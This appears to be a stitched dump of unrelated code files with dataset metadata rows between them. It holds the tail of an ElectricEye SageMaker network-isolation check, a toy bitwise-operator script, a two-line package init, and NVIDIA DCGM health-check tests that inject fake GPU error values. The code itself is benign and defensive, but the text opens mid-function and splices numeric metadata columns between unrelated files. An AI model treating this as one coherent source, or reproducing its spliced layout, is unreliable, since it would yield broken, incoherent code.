        if not networkIsolationCheck:
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": modelArn + "/sagemaker-model-network-isolation-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": modelArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "MEDIUM"},
                "Confidence": 99,
                "Title": "[SageMaker.5] SageMaker models should have network isolation enabled",
                "Description": "SageMaker model "
                + modelName
                + " does not have network isolation enabled. Refer to the remediation instructions to remediate this behavior",
                "Remediation": {
                    "Recommendation": {
                        "Text": "For more information on SageMaker model network isolation and how to configure it refer to the Training and Inference Containers Run in Internet-Free Mode section of the Amazon SageMaker Developer Guide",
                        "Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/mkt-algo-model-internet-free.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsSagemakerModel",
                        "Id": modelArn,
                        "Partition": "aws",
                        "Region": awsRegion,
                        "Details": {"Other": {"modelName": modelName}},
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF PR.AC-5",
                        "NIST SP 800-53 AC-4",
                        "NIST SP 800-53 AC-10",
                        "NIST SP 800-53 SC-7",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.13.1.1",
                        "ISO 27001:2013 A.13.1.3",
                        "ISO 27001:2013 A.13.2.1",
                        "ISO 27001:2013 A.14.1.2",
                        "ISO 27001:2013 A.14.1.3",
                    ],
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
        else:
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": modelArn + "/sagemaker-model-network-isolation-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": modelArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "INFORMATIONAL"},
                "Confidence": 99,
                "Title": "[SageMaker.5] SageMaker models should have network isolation enabled",
                "Description": "SageMaker model " + modelName + " has network isolation enabled.",
                "Remediation": {
                    "Recommendation": {
                        "Text": "For more information on SageMaker model network isolation and how to configure it refer to the Training and Inference Containers Run in Internet-Free Mode section of the Amazon SageMaker Developer Guide",
                        "Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/mkt-algo-model-internet-free.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsSagemakerModel",
                        "Id": modelArn,
                        "Partition": "aws",
                        "Region": awsRegion,
                        "Details": {"Other": {"modelName": modelName}},
                    }
                ],
                "Compliance": {
                    "Status": "PASSED",
                    "RelatedRequirements": [
                        "NIST CSF PR.AC-5",
                        "NIST SP 800-53 AC-4",
                        "NIST SP 800-53 AC-10",
                        "NIST SP 800-53 SC-7",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.13.1.1",
                        "ISO 27001:2013 A.13.1.3",
                        "ISO 27001:2013 A.13.2.1",
                        "ISO 27001:2013 A.14.1.2",
                        "ISO 27001:2013 A.14.1.3",
                    ],
                },
                "Workflow": {"Status": "RESOLVED"},
                "RecordState": "ARCHIVED",
            }
            yield finding
| 49.851852
| 237
| 0.496608
| 2,499
| 30,958
| 6.135654
| 0.111245
| 0.01774
| 0.026609
| 0.028827
| 0.887824
| 0.886128
| 0.881106
| 0.875302
| 0.875302
| 0.871062
| 0
| 0.049487
| 0.395568
| 30,958
| 621
| 238
| 49.851852
| 0.769934
| 0.04364
| 0
| 0.821918
| 0
| 0.034247
| 0.403538
| 0.049186
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008562
| false
| 0.008562
| 0.005137
| 0
| 0.013699
| 0.005137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91c67c7f22007ae225f1c33a054359b4b5cab5aa
| 188
|
py
|
Python
|
12 oporators/BitwiseOper.py
|
codewithsandy/Python-Basic-Exp
|
4c70ada4a042923a94301453c7bd76e704cd2989
|
[
"MIT"
] | 3
|
2021-05-08T13:11:41.000Z
|
2021-05-14T02:43:20.000Z
|
12 oporators/BitwiseOper.py
|
codewithsandy/Python-Basic-Exp
|
4c70ada4a042923a94301453c7bd76e704cd2989
|
[
"MIT"
] | null | null | null |
12 oporators/BitwiseOper.py
|
codewithsandy/Python-Basic-Exp
|
4c70ada4a042923a94301453c7bd76e704cd2989
|
[
"MIT"
] | null | null | null |
print("Bitwise Operator")

# Two-bit binary representations for reference:
# 0 -> 00, 1 -> 01, 2 -> 10, 3 -> 11

# OR of each demonstration pair (same output as the original prints)
for left, right in ((0, 1), (0, 2), (1, 3), (2, 3)):
    print(left | right)

print(0 & 1)  # AND
| 14.461538
| 25
| 0.382979
| 28
| 188
| 2.571429
| 0.464286
| 0.25
| 0.194444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217822
| 0.462766
| 188
| 13
| 26
| 14.461538
| 0.49505
| 0.37234
| 0
| 0
| 0
| 0
| 0.150943
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
91da7f3be2e73fea2e3f8e7a05b8aeb96d7d304c
| 133
|
py
|
Python
|
irradiance_synth/__init__.py
|
Ekistica/irradiance_synth
|
4f4c5cf9e898739b59066fdf56dd66e5f4b45e60
|
[
"MIT"
] | null | null | null |
irradiance_synth/__init__.py
|
Ekistica/irradiance_synth
|
4f4c5cf9e898739b59066fdf56dd66e5f4b45e60
|
[
"MIT"
] | null | null | null |
irradiance_synth/__init__.py
|
Ekistica/irradiance_synth
|
4f4c5cf9e898739b59066fdf56dd66e5f4b45e60
|
[
"MIT"
] | null | null | null |
from irradiance_synth.irradiance_dataset import IrradianceDataset
from irradiance_synth.irradiance_synth import IrradianceSynthesizer
| 66.5
| 67
| 0.932331
| 14
| 133
| 8.571429
| 0.5
| 0.375
| 0.316667
| 0.483333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 133
| 2
| 67
| 66.5
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
91dfd3aad9adc2bfdf9d26218df6c9880913e639
| 56,737
|
py
|
Python
|
testing/python3/tests/test_health.py
|
deepio/DCGM
|
d10273f18fb3d425da752ab6bb7e07af3d18caec
|
[
"Apache-2.0"
] | 85
|
2021-02-03T19:58:50.000Z
|
2022-03-21T08:00:11.000Z
|
testing/python3/tests/test_health.py
|
deepio/DCGM
|
d10273f18fb3d425da752ab6bb7e07af3d18caec
|
[
"Apache-2.0"
] | 19
|
2021-03-19T08:13:58.000Z
|
2022-03-17T02:50:41.000Z
|
testing/python3/tests/test_health.py
|
deepio/DCGM
|
d10273f18fb3d425da752ab6bb7e07af3d18caec
|
[
"Apache-2.0"
] | 17
|
2021-02-04T06:47:30.000Z
|
2022-03-21T22:14:03.000Z
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# test the health module for DCGM
import pydcgm
import dcgm_structs
import dcgm_structs_internal
import dcgm_agent
import dcgm_agent_internal
import dcgmvalue
import logger
import test_utils
import dcgm_fields
import time
from ctypes import *
import sys
import os
import pprint
import dcgm_internal_helpers
import dcgm_errors
def skip_test_if_unhealthy(groupObj):
    """Skip the running test when the group is already failing health checks."""
    health = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    if health.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_PASS:
        return
    # Join every incident's error message into a single skip reason
    reasons = [health.incidents[idx].error.msg for idx in range(health.incidentCount)]
    test_utils.skip_test(
        "Skipping health check test because we are already unhealthy: " + ", ".join(reasons))
def helper_dcgm_health_set_pcie(handle):
    """
    Verifies that the set/get path for the health monitor is working
    Checks for call errors are done in the bindings
    """
    group = pydcgm.DcgmHandle(handle=handle).GetSystem().GetDefaultGroup()

    # Start from a clean slate: no watches enabled
    group.health.Set(0)
    assert (group.health.Get() == 0)

    # Enable the PCIe watch and confirm it round-trips through Get()
    wantedSystems = 0 | dcgm_structs.DCGM_HEALTH_WATCH_PCIE
    group.health.Set(wantedSystems)
    assert (group.health.Get() == wantedSystems)

    # Set it back to 0 and validate it
    group.health.Set(0)
    assert (group.health.Get() == 0)
@test_utils.run_with_embedded_host_engine()
def test_dcgm_health_set_pcie_embedded(handle):
    """Set/get round-trip of the PCIe health watch against an embedded host engine."""
    helper_dcgm_health_set_pcie(handle)

@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_health_set_pcie_standalone(handle):
    """Set/get round-trip of the PCIe health watch against a standalone host engine."""
    helper_dcgm_health_set_pcie(handle)
@test_utils.run_with_embedded_host_engine()
def test_dcgm_health_invalid_group_embedded(handle):
    '''
    Validate that group operations fail if a bogus group ID is provided
    '''
    # Arbitrary pointer value that does not correspond to any real group
    invalidGroupId = c_void_p(99)
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = pydcgm.DcgmGroup(handleObj, groupId=invalidGroupId)
    # Each health operation against the bogus group must raise DCGM_ST_NOT_CONFIGURED
    with test_utils.assert_raises(dcgm_structs.dcgmExceptionClass(dcgm_structs.DCGM_ST_NOT_CONFIGURED)):
        groupObj.health.Set(dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
    with test_utils.assert_raises(dcgm_structs.dcgmExceptionClass(dcgm_structs.DCGM_ST_NOT_CONFIGURED)):
        groupObj.health.Get()
    with test_utils.assert_raises(dcgm_structs.dcgmExceptionClass(dcgm_structs.DCGM_ST_NOT_CONFIGURED)):
        groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
def helper_dcgm_health_check_pcie(handle, gpuIds):
    """
    Verifies that a check error occurs when an error is injected
    Checks for call errors are done in the bindings except dcgmClientHealthCheck
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds()  # Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]
    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_PCIE
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)
    # Baseline: zero PCIe replays, timestamped 50 seconds in the past
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    response = groupObj.health.Check()
    # we expect that there will be no data here

    # inject an error into PCI
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
                                                       10, 100)  # set the injected data into the future
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # The jump in replay count should surface exactly one PCIe incident
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_PCI_REPLAY_RATE)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_pcie_embedded(handle, gpuIds):
    """PCIe replay-rate health check against an embedded host engine."""
    helper_dcgm_health_check_pcie(handle, gpuIds)

@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_pcie_standalone(handle, gpuIds):
    """PCIe replay-rate health check against a standalone host engine."""
    helper_dcgm_health_check_pcie(handle, gpuIds)
def helper_test_dcgm_health_check_mem_dbe(handle, gpuIds):
    """
    Verifies that the health check will fail if there's 1 DBE and it continues to be
    reported
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds()  # Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]
    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)
    # Inject 2 volatile DBEs and expect a MEM failure incident
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
                                                       2, -50)  # set the injected data to 50 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)

    # Give it the same failure 45 seconds ago and make sure we fail again
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
                                                       2, -45)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)

    # Make the failure count go down to zero. This should clear the error
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
                                                       0, -40)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_PASS)

@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_mem_dbe(handle, gpuIds):
    """Volatile DBE health check against a standalone host engine."""
    helper_test_dcgm_health_check_mem_dbe(handle, gpuIds)
def helper_verify_dcgm_health_watch_mem_result(groupObj, errorCode, verifyFail=False, gpuId=0):
    """
    Verify that memory health check result is what was expected. If verifyFail is False, verify a pass result,
    otherwise verify a failure occurred with the expected errorCode.
    """
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    if not verifyFail:
        assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_PASS)
        return

    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    # BUG FIX: errorCode was accepted but never checked; verify the incident
    # actually reports the specific error code the caller expects
    assert (responseV4.incidents[0].error.code == errorCode), \
        "Expected error code %d but found %d" % (errorCode, responseV4.incidents[0].error.code)
def helper_reset_page_retirements(handle, gpuId=0, reset_sbe=False):
    """
    Helper function to reset non volatile page retirements.
    """
    fieldsToClear = [dcgm_fields.DCGM_FI_DEV_RETIRED_DBE]
    if reset_sbe:
        fieldsToClear.append(dcgm_fields.DCGM_FI_DEV_RETIRED_SBE)
    for fieldId in fieldsToClear:
        # Inject a zero reading timestamped 30 seconds in the past
        ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, fieldId, 0, -30)
        assert (ret == dcgm_structs.DCGM_ST_OK)
def helper_test_dcgm_health_check_mem_retirements(handle, gpuIds):
    """
    Verifies that the health check will fail when the number of non-volatile page retirements
    match the failure criteria.
    Specifically tests the criteria given in DCGM-458.
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds()  # Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]
    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)

    ####### Tests #######
    #### Condition 1 ####
    ### Fail if the total number of page retirements (due to DBE or SBE) meets or exceeds 60
    ## Test 1: >= 60 page retirements total should fail
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
                                                       30, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_SBE,
                                                       30, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Make sure we get a failure
    helper_verify_dcgm_health_watch_mem_result(groupObj, dcgm_errors.DCGM_FR_RETIRED_PAGES_LIMIT, verifyFail=True,
                                               gpuId=gpuId)
    # Reset the field and verify clean result
    helper_reset_page_retirements(handle, gpuId=gpuId, reset_sbe=True)
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)

    ## Test 2: 59 page retirements total should pass
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
                                                       10, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_SBE,
                                                       49, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Make sure we pass
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
    # Reset the field and verify clean result
    helper_reset_page_retirements(handle, gpuId=gpuId, reset_sbe=True)
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)

    #### Condition 2 ####
    ### Fail if > 15 page retirement due to DBEs AND more than 1 DBE page retirement in past week
    ## Test 1: 15 page retirements due to DBEs should pass
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
                                                       15, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Make sure we pass
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
    # Reset the field and verify clean result
    helper_reset_page_retirements(handle, gpuId=gpuId)
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)

    ## Test 2: 16 page retirements due to DBE should fail (since all 16 are inserted in current week)
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
                                                       16, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Make sure we get a failure
    helper_verify_dcgm_health_watch_mem_result(groupObj, dcgm_errors.DCGM_FR_RETIRED_PAGES_DBE_LIMIT,
                                               verifyFail=True, gpuId=gpuId)
    # Reset the field and verify clean result
    helper_reset_page_retirements(handle, gpuId=gpuId)
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)

    ## Test 3: 16 page retirements due to SBEs should pass
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_SBE,
                                                       16, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Make sure we pass
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
    # Reset the field and verify clean result
    helper_reset_page_retirements(handle, gpuId=gpuId, reset_sbe=True)
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)

    ## Test 4: 16 page retirements due to DBEs (with first 15 pages inserted more than 1 week ago,
    # and 16th page inserted in current week) should pass
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
                                                       15, -604860)  # set the injected data to 7 days and 1 minute ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
                                                       1, -30)  # set the injected data to 30 seconds ago
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Make sure we pass
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
    # Reset the field and verify clean result
    helper_reset_page_retirements(handle, gpuId=gpuId)
    helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)

@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_dcgm_health_check_mem_retirements_standalone(handle, gpuIds):
    """Memory page-retirement health criteria against a standalone host engine."""
    helper_test_dcgm_health_check_mem_retirements(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_dcgm_health_check_mem_retirements_embedded(handle, gpuIds):
    """Memory page-retirement health criteria against an embedded host engine."""
    helper_test_dcgm_health_check_mem_retirements(handle, gpuIds)
def helper_test_dcgm_health_check_mem(handle, gpuIds):
    """
    Verifies that a check error occurs when an error is injected
    Checks for call errors are done in the bindings except dcgmClientHealthCheck
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds()  # Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]
    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)
    # Baseline: no pending page retirements, 50 seconds in the past
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Inject pending page retirements -> expect a single MEM warning incident
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING,
                                                       100, -40)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.incidentCount == 1), "Expected 1 incident but found %d" % responseV4.incidentCount
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_PENDING_PAGE_RETIREMENTS),\
        "Expected %d but found %d" % (dcgm_errors.DCGM_FR_PENDING_PAGE_RETIREMENTS, \
        responseV4.incidents[0].error.code)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_WARN),\
        "Expected warning but found %d" % responseV4.incidents[0].health

    # Clear the error
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING,
                                                       0, -35)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # Make sure we've set the monitor frequency to less than 35 seconds - that will make us around
    # half or less of the 60 seconds we give the data before calling it stale.
    cmFieldInfo = dcgm_agent_internal.dcgmGetCacheManagerFieldInfo(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING)
    assert cmFieldInfo.monitorFrequencyUsec < 35000000

@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_mem_standalone(handle, gpuIds):
    """Pending-page-retirement health check against a standalone host engine."""
    helper_test_dcgm_health_check_mem(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_mem_embedded(handle, gpuIds):
    """Pending-page-retirement health check against an embedded host engine."""
    helper_test_dcgm_health_check_mem(handle, gpuIds)
@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_standalone_health_set_thermal(handle):
    """
    Verifies that the set/get path for the health monitor is working
    Checks for call errors are done in the bindings
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetDefaultGroup()
    # Start from a clean slate: no watches enabled
    groupObj.health.Set(0)
    currentSystems = groupObj.health.Get()
    assert (currentSystems == 0)
    # Enable the thermal watch and confirm it round-trips through Get()
    newSystems = currentSystems | dcgm_structs.DCGM_HEALTH_WATCH_THERMAL
    groupObj.health.Set(newSystems)
    currentSystems = groupObj.health.Get()
    assert (currentSystems == newSystems)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_check_thermal(handle, gpuIds):
    """
    Verifies that a check error occurs when an error is injected
    Checks for call errors are done in the bindings except dcgmClientHealthCheck
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds()  # Limit gpuIds to GPUs in our group
    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_THERMAL
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)
    # Baseline: zero thermal violations, timestamped 50 seconds in the past
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuIds[0],
                                                       dcgm_fields.DCGM_FI_DEV_THERMAL_VIOLATION, 0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    # we expect that there will be no data here
    #assert (dcgm_structs.DCGM_ST_OK == result or dcgm_structs.DCGM_ST_NO_DATA == result)

    # inject an error into thermal
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuIds[0],
                                                       dcgm_fields.DCGM_FI_DEV_THERMAL_VIOLATION, 1000, 10)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    # The violation should surface exactly one thermal-throttle incident
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuIds[0])
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_THERMAL)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_CLOCK_THROTTLE_THERMAL)
